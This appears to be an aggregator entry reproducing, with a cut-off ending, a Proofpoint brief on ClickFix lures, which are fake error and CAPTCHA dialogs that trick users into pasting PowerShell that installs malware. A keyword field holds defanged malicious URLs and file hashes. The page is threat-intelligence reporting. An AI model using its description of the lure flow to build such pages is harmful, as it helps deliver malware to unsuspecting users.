One Article Review
| Source |  ProofPoint |
|---|---|
| Identifiant | 8613359 |
| Date de publication | 2024-11-18 10:34:05 (vue: 2024-11-18 10:07:38) |
| Titre | Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape |
| Texte | What happened Proofpoint researchers have identified an increase in a unique social engineering technique called ClickFix. And the lures are getting even more clever. Initially observed earlier this year in campaigns from initial access broker TA571 and a fake update website compromise threat cluster known as ClearFake, the ClickFix technique that attempts to lure unsuspecting users to copy and run PowerShell to download malware is now much more popular across the threat landscape. The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer. Example of early ClickFix technique used by ClearFake. Proofpoint has observed threat actors impersonating various software and services using the ClickFix technique as part of their social engineering, including common enterprise software such as Microsoft Word and Google Chrome, as well as software specifically observed in target environments such as transportation and logistics. The ClickFix technique is used by multiple different threat actors and can originate via compromised websites, documents, HTML attachments, malicious URLs, etc. In most cases, when directed to the malicious URL or file, users are shown a dialog box that suggests an error occurred when trying to open a document or webpage. This dialog box includes instructions that appear to describe how to “fix” the problem, but will either: automatically copy and paste a malicious script into the PowerShell terminal, or the Windows Run dialog box, to eventually run a malicious script via PowerShell; or provide a user with instructions on how to manually open PowerShell and copy and paste the provided command. Proofpoint has observed ClickFix campaigns leading to malware including AsyncRAT, Danabot, DarkGate, Lumma Stealer, NetSupport, and more. ClickFix campaigns observed March through October 2024. Notably, threat actors have been observed recently using a fake CAPTCHA themed ClickFix technique that pretends to validate the user with a "Verify You Are Human" (CAPTCHA) check. Much of the activity is based on an open source toolkit named reCAPTCHA Phish available on GitHub for “educational purposes.” The tool was released in mid-September by a security researcher, and Proofpoint began observing it in email threat data just days later. The purpose of the repository was to demonstrate a similar technique used by threat actors since August 2024 on websites related to video streaming. Ukraine CERT recently published details on a suspected Russian espionage actor using the fake CAPTCHA ClickFix technique in campaigns targeting government entities in Ukraine. Recent examples GitHub “Security Vulnerability” notifications On 18 September 2024, Proofpoint researchers identified a campaign using GitHub notifications to deliver malware. The messages were notifications for GitHub activity. The threat actor either commented on or created an issue in a GitHub repository. If the repository owner, issue owner, or other relevant collaborators had email notifications enabled, they received an email notification containing the content of the comment or issue from GitHub. This campaign was publicly reported by security journalist Brian Krebs. Email from GitHub. The notification impersonated a security warning from GitHub and included a link to a fake GitHub website. The fake website used the reCAPTCHA Phish and ClickFix social engineering technique to trick users into executing a PowerShell command on their computer. ClickFix style “verification steps” to execute PowerShell. The landing page contained a fake reCAPTCHA message at the end of the copied command so the target would not see the actual malicious command in the run-box when the malicious command was pasted. If the user performed the requested steps, PowerShell code was execu |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | 0050 112 113 116 117 118 119 119 124 130 147 152/x64 157 185 193 2023 2024 2024 214 215 224 252/v10/ukyh 300 40/capcha 40:4404 49/a6dxmijz 49/chrome 5d5b4f259ef3b3d20f6ef1a63def6dee9326efe2b7b7b7e474008aa978f1f19b 7zip about access according across action activity actor actors actual actually addition adoption adversaries advertisement after agent alert aljiri all alleged allegedly allow also although analysis analysts another any anyone appear appears are aresloader assessed assesses asyncrat attachment attachments attack attacker attempted attempts attributable attribute attributed attribution august automatic automatically available base64 based bat bazarunet been began behaviors being best better bits blocked body boot both box boxes brains brian brief: broker brute bruteratel budget business but button bypasses c2 call called came campaign campaigns can captcha cases causing cert chain characters chatgpt chatgpt” check chrome chumboxes claiming clearfake clearly clever click clicked clickfix clickfix technique clipboard cluster clusters code collaborators com com/l6e com/profiles/76561199724331900 com/scl/fi/z4vwx6uot2bwugh34fbvz/captcha command comment commented comments commerce common community compressed compromise compromise compromised computer confidence contain contained containing content copied copy copying copytoclipboard crafty create created creative customized cybercrime d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207 d9ab6cfa60cc75785e31ca9b5a31dae1c33022bdb90cb382ef3ca823c627590d danabot darkgate data days deliver delivering delivers delivery demonstrate depending describe description desire despite details dialog dialogue did different direct directed display displayed distinctly distributed distribution dll dll doc document documents domain domain download downloaded dropbox dropped e726d3324ca8b9a8da4d317c5d749dd0ad58fd447a2eb5eee75ef14824339cd5 each earlier early edition eemmbryequo effective efforts either either: else email emails embedded emotions empowered enabled encoded encouraging end engineering english enterprise entities environments error es/ricardo/captchav4de/ espionage etc evade even eventually example example: examples examples exe executable execute executed executing explaining exploitation extract fake feel file filename filenames files finance financially firms first fix” fjggdng floods focus focused followed from from: full functions gain generated generator german get getting github given globally google government greshunka group groups growing guardian hackers hacking had happened has have having hdkr2jol helpful hesitant hidden high how however hta html html human hvnc hxxp://178 hxxp://185 hxxp://188 hxxp://31 hxxps://github hxxps://ricardo hxxps://steamcommunity hxxps://www identified identify impacted impersonated impersonating impersonation important included includes including increase independent indicator indicators infect information initial initially inject innate innovation insecure insidious installation installing instruct instructed instructions invoice invoked isomicrotich issue javascript join journalist just keennylrwmqlw keep key known krebs landing landscape language languages large later latrodectus latrodectus launch leading least led left less licenseodqwmqn likely link linked links llm logistics lot lucky lumma lure lures macros malicious malvertising malware malware manual manually many march marketplace masqueraded matters may mechanisms media message messages microsoft mid more most mostly motivated mshta much multiple named names needing netsupport never not notably notification notifications notifications now numeric obfuscated objectives observed observed observing occurred october online online online” open opened organizations original originate other outbrain outlets overlap overlapped overlaps own owned owner page |
| Tags | Malware Tool Threat |
| Stories | ChatGPT |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.